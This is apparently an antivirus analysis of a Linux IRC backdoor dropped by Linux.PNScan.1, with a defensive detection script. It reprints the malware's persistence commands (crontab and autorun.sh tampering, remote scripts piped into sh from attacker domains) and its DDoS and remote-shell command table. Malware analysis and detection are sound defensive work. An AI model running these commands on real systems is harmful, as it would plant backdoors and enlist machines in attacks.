SHA1:
- e8a8d48e1083e7146d5efcba1d6490f05cd8c897 (unpacked)
- 577551c6a550c3fd30169fb4c2a62fa8b6e73686 (packed)
A family of backdoors for Linux that Linux.PNScan.1 installs on the compromised system. Once launched, the Trojan attempts to ensure its autorun by executing the following commands:
system("echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &");
system("rm -rf /var/run/wgs* > /dev/null 2>&1 &");
system("rm -rf /var/run/bbs* > /dev/null 2>&1 &");
system("rm -rf /var/run/tty* > /dev/null 2>&1 &");
system("ulimit -s unlimited > /dev/null 2>&1 &");
system("mount -t ext2 /dev/mtdblock4 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/mtdblock5 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdx6 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdc6 /tmp/config > /dev/null 2>&1");
system("rm -rf /var/run/getty1 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty2 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty3 > /dev/null 2>&1 &");
system("cat /tmp/config/autorun.sh | grep -v \"nameserver 8.8.8.8\" | grep -v \"sleep 43200\" | grep -v \"erpcit\" | grep -v \"o.kei\" > /var/run/.backup");
system("echo \"echo \"nameserver 8.8.8.8\" > /etc/resolv.conf\" >> /var/run/.backup");
system("echo \"sleep 120 && wget -qO - http://*.***.su/qn | sh > /dev/null 2>&1 &\" >> /var/run/.backup");
system("cat /var/run/.backup > /tmp/config/autorun.sh");
system("chmod +x /tmp/config/autorun.sh");
system("umount /tmp/config");
system("rm -rf /var/run/.backup");
system("cat /etc/config/crontab | grep -v \"gettychk\" > /tmp/.fuckw");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckw");
system("cat /tmp/.fuckw > /etc/config/crontab");
system("crontab -l | grep -v \"gettychk\" > /var/run/.fuckx");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckx");
system("echo \"#!/bin/sh\" > /var/run/gettychk");
system("echo \"pidof getty0 || ( rm -rf /var/run/getty.pid && /var/run/getty0 ) \" >> /var/run/gettychk");
system("chmod 700 /var/run/gettychk");
system("crontab /var/run/.fuckx");
system("crontab /etc/config/crontab");
system("rm -rf /var/run/.fuckw");
system("rm -rf /var/run/.fuckx");
system("/etc/init.d/crond.sh restart > /dev/null 2>&1 &");
system("wget -qO - http://*.***.su/botkill | sh > /dev/null 2>&1 &");
To connect to the IRC server, the Trojan generates the name and alias string as follows:
x32|Linux|root|%c%c%c%c%c%c%c%c%c
where each %c is a random digit from the set "0123456789". If the backdoor does not have root privileges, "unk" is used in place of "root".
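The persistence commands above and the identity string leave a small set of host and network artifacts. The following is an added triage helper, not code from the Dr.Web analysis, that flags them on constructed sample data; the domain `example.invalid` and all sample contents are assumptions standing in for what a real host would contain.

```python
import re

# Cron watchdog line written by the persistence routine above
CRON_WATCHDOG = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+/var/run/gettychk\b")
# Body of /var/run/gettychk: restart getty0 if it is not running
WATCHDOG_BODY = re.compile(r"pidof getty0\s*\|\|.*/var/run/getty0\b")
# Remote script piped straight into sh (autorun.sh and the botkill stage)
REMOTE_SH = re.compile(r"wget\s+-qO\s*-\s+\S+\s*\|\s*sh\b")
# Identity string sent to the IRC server: x32|Linux|<root|unk>|<nine digits>
IRC_IDENT = re.compile(r"^x32\|Linux\|(?:root|unk)\|[0-9]{9}$")

def scan_crontab(text):
    """Return 1-based line numbers of crontab entries running the gettychk watchdog."""
    return [i for i, line in enumerate(text.splitlines(), 1)
            if CRON_WATCHDOG.search(line)]

def classify_script(text):
    """Label a shell script (e.g. /var/run/gettychk or autorun.sh) by the patterns it contains."""
    hits = set()
    if WATCHDOG_BODY.search(text):
        hits.add("getty0-watchdog")
    if REMOTE_SH.search(text):
        hits.add("remote-script-pipe")
    if "nameserver 8.8.8.8" in text and "/etc/resolv.conf" in text:
        hits.add("resolv-overwrite")
    return sorted(hits)

def is_tsunami_ident(ident):
    """True if an IRC identity string matches the backdoor's generated format."""
    return IRC_IDENT.match(ident) is not None

# Constructed samples (not captured from a real system)
SAMPLE_CRONTAB = """# constructed sample crontab
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * /var/run/gettychk > /dev/null 2>&1
"""
SAMPLE_WATCHDOG = "#!/bin/sh\npidof getty0 || ( rm -rf /var/run/getty.pid && /var/run/getty0 ) \n"
SAMPLE_AUTORUN = ('echo "nameserver 8.8.8.8" > /etc/resolv.conf\n'
                  'sleep 120 && wget -qO - http://example.invalid/qn | sh > /dev/null 2>&1 &\n')

if __name__ == "__main__":
    print("crontab hits:", scan_crontab(SAMPLE_CRONTAB))
    print("gettychk:", classify_script(SAMPLE_WATCHDOG))
    print("autorun.sh:", classify_script(SAMPLE_AUTORUN))
    print("ident match:", is_tsunami_ident("x32|Linux|root|482910375"))
```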
Once connected to the IRC server, the malicious program waits for incoming commands. The backdoor handles the following server messages and commands:
Command | Action | Comments |
---|---|---|
352 | Set a fake IP | |
433 | Generate a new nickname | |
ERROR | Generate a new nickname | |
NICK | Take a string from the command as a nickname | |
PING | Send PONG | |
376 | Join the channel | Send(fd, "NICK %s\n", nick); Send(fd, "MODE %s -xi\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
422 | Join the channel | Send(fd, "NICK %s\n", nick); Send(fd, "MODE %s -xi\n", nick); Send(fd, "JOIN %s :%s\n", chan, pass); |
PRIVMSG | Execute an extended command (see the table below) | |
Moreover, the Trojan can execute a number of extended commands.
Command | Action | Syntax / command executed |
---|---|---|
RANDOMFLOOD | Randomly switch between ACK and SYN Flood | RANDOMFLOOD <target> <port> <secs> |
ACKFLOOD | ACK Flood (spoofed) | ACKFLOOD <target> <port> <secs> |
SYNFLOOD | SYN Flood (spoofed) | SYNFLOOD <target> <port> <secs> |
TSUNAMI | Launch a DDoS attack | TSUNAMI <target> <secs> |
PAN | “Advanced” SYN Flood | PAN <target> <port> <secs> |
SUDP | UDP Flood (spoofed) | SUDP <target> <port> <secs> |
UDP | UDP Flood | UDP <target> <port> <secs> |
NSACKFLOOD | ACK Flood | NSACKFLOOD <target> <port> <secs> |
NSSYNFLOOD | SYN Flood | NSSYNFLOOD <target> <port> <secs> |
STD | Launch a DDoS attack | STD <target> <port> <secs> |
UNKNOWN | Launch a DDoS attack | UNKNOWN <target> <secs> (recommended for non-root users) |
KILLALL | Terminate a DDoS attack | |
DNS | Identify domain and send the server its IP | |
CUSTOM | Execute a custom script (at the specified link) | wget -qO - http://o.kei.su/custom | sh > /dev/null 2>&1 |
PATCH | Apply a patch against the shellshock vulnerability | wget -qO - http://o.kei.su/patch | sh > /dev/null 2>&1 |
BOTKILL | Remove other Trojans | wget -qO - http://o.kei.su/botkill | sh > /dev/null 2>&1 |
GETSPOOFS | Get spoofing parameters | |
SPOOFS | Set an IP or an IP range for spoofing | SPOOFS <iprange/ip> |
VERSION | Return backdoor's version | |
SERVER | Change the server to the one specified in the command | |
GET | Download a specified file | GET <url> <save as> |
IRC | Send specified IRC commands to the server | IRC <arg1> <arg2> <arg...> |
HELP | Display the list of available commands | |
SH | Execute a set of SH commands | SH <arg1> <arg2> <arg...> |